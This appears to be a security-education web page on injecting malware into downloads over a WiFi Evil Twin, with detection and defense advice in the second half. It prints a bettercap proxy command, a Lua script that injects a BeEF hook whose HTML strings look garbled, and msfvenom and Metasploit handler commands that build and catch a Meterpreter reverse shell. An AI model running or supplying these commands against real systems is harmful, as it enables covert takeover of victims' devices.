WiFi Attack

Malware Injection via WiFi

Technical documentation on Malware Injection. Understand the attack technique and learn how to defend against...

Medium Threat Intermediate

Updated April 2026

3 min read

MalwareZero Research Team Updated April 2026

id="how-malware-injection-works">How Malware Gets Injected Over WiFi

When a victim browses an HTTP site through the attacker's Evil Twin, the attacker can read and modify any part of the HTTP response — including HTML, JavaScript, and downloadable files. The attacker injects malicious code into responses that the victim's browser then executes.

Malware Injection Flow: [Victim Browser] ──── HTTP GET /downloads/app.exe ────→ [Attacker MITM] [Attacker MITM] ──── HTTP GET /downloads/app.exe ────→ [Real Server] [Real Server] ←─── Legitimate app.exe ──── [Attacker MITM] [Attacker] ──── app.exe + embedded Meterpreter payload ────→ [Victim] [Attacker] ←─── Meterpreter connection (port 4444) ──── [Victim] [Victim thinks they downloaded a legitimate app] [Actually: infected with remote access trojan] [Attacker now has full control of victim device]

Evil Twin + Proxy Injection with bettercap

The bettercap proxy module intercepts HTTP traffic and can inject JavaScript, replace binaries, or modify HTML on the fly.

$ sudo bettercap -eval "set http.proxy.on true; http.proxy.script /tmp/inject-beef.lua"



# inject-beef.lua — injects BeEF hook into HTTP pages

function onResponseHeaders(req, res)

  if HTTP.isHtml(res) then

    res:addHeader("X-Injected-By", "beef")

    local body = res.body

    if string.find(body, "

  

  

  

  

") then

      body = string.gsub(body, "

  

  

  

  

",

        '

  

  

  

  

')

      res.body = body

    end

  end

end



[Every HTTP page the victim visits now contains the BeEF hook]

[Attacker can now run commands in the victim's browser via BeEF panel]

Metasploit Meterpreter Payload Generation

For binary payload injection, the attacker generates a Metasploit Meterpreter payload and injects it into legitimate downloads. Meterpreter provides a full-featured remote shell with file system access, process management, keylogging, and module extensibility.

$ # Generate a Meterpreter payload (for authorized testing only)

$ msfvenom -p windows/x64/meterpreter/reverse_tcp \

    LHOST=192.168.1.1 LPORT=4444 \

    -f exe -o /tmp/update.exe



[-] No platform was selected, making windows/x64

[+] Generated payload: 51,824 bytes



# Start Metasploit handler

$ msfconsole -q -x "

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.1.1

set LPORT 4444

run -j

"



[*] Started reverse TCP handler on 192.168.1.1:4444

[*] Sending stage (176219 bytes) to 192.168.1.147

[*] Meterpreter session 1 opened



[Attacker now has Meterpreter shell on victim machine]

Why This Works Despite HTTPS

The injection happens at the binary level — the attacker replaces a legitimate download (say, a PDF or installer) with an infected version. If the victim downloads a file from an HTTP site (no HTTPS), the attacker can modify it. Even on HTTPS sites, if the attacker has a valid certificate for a similar domain and the victim can be tricked into downloading, the injection succeeds. HTTPS protects the content of connections but doesn't prevent a malicious binary from being served if the attacker has MITM access.

How to Detect Malicious Downloads

Check file hash: Verify the SHA-256 hash of any downloaded file against the official publisher's hash
Check file size: Unexpectedly large or small files compared to the expected download are suspicious
Code signing verification: On Windows, right-click the file → Properties → Digital Signatures. Verify the signature is from the legitimate publisher and the certificate is valid.
Antivirus scanning: Upload the file to VirusTotal.com before running it
Network monitoring: Unexpected outbound connections from your device (especially to port 4444 or unusual ports) indicate compromise

Defense Against Malware Injection

HTTPS everywhere: Only download files over HTTPS — injection into HTTPS requires certificate substitution, which triggers browser warnings
Code signing enforcement: Enable Windows Smart App Control or macOS Gatekeeper to block unverified executables
Endpoint protection: Modern EDR solutions detect process injection, unusual outbound connections, and Meterpreter behavior
VPN: Encrypts all traffic, preventing proxy injection at the network level
Application whitelisting: Block execution of unsigned executables, especially from browser download folders
Don't download from HTTP sites: Any site still using plain HTTP is a malware injection risk

← PreviousSession Hijacking: WiFi Attacks Next →Rogue AP: Fake Access Point Attacks

Understand the Threat. Build the Defense.

Learn how to protect yourself and your organization against Malware Injection attacks.

View Defense Guide All Attacks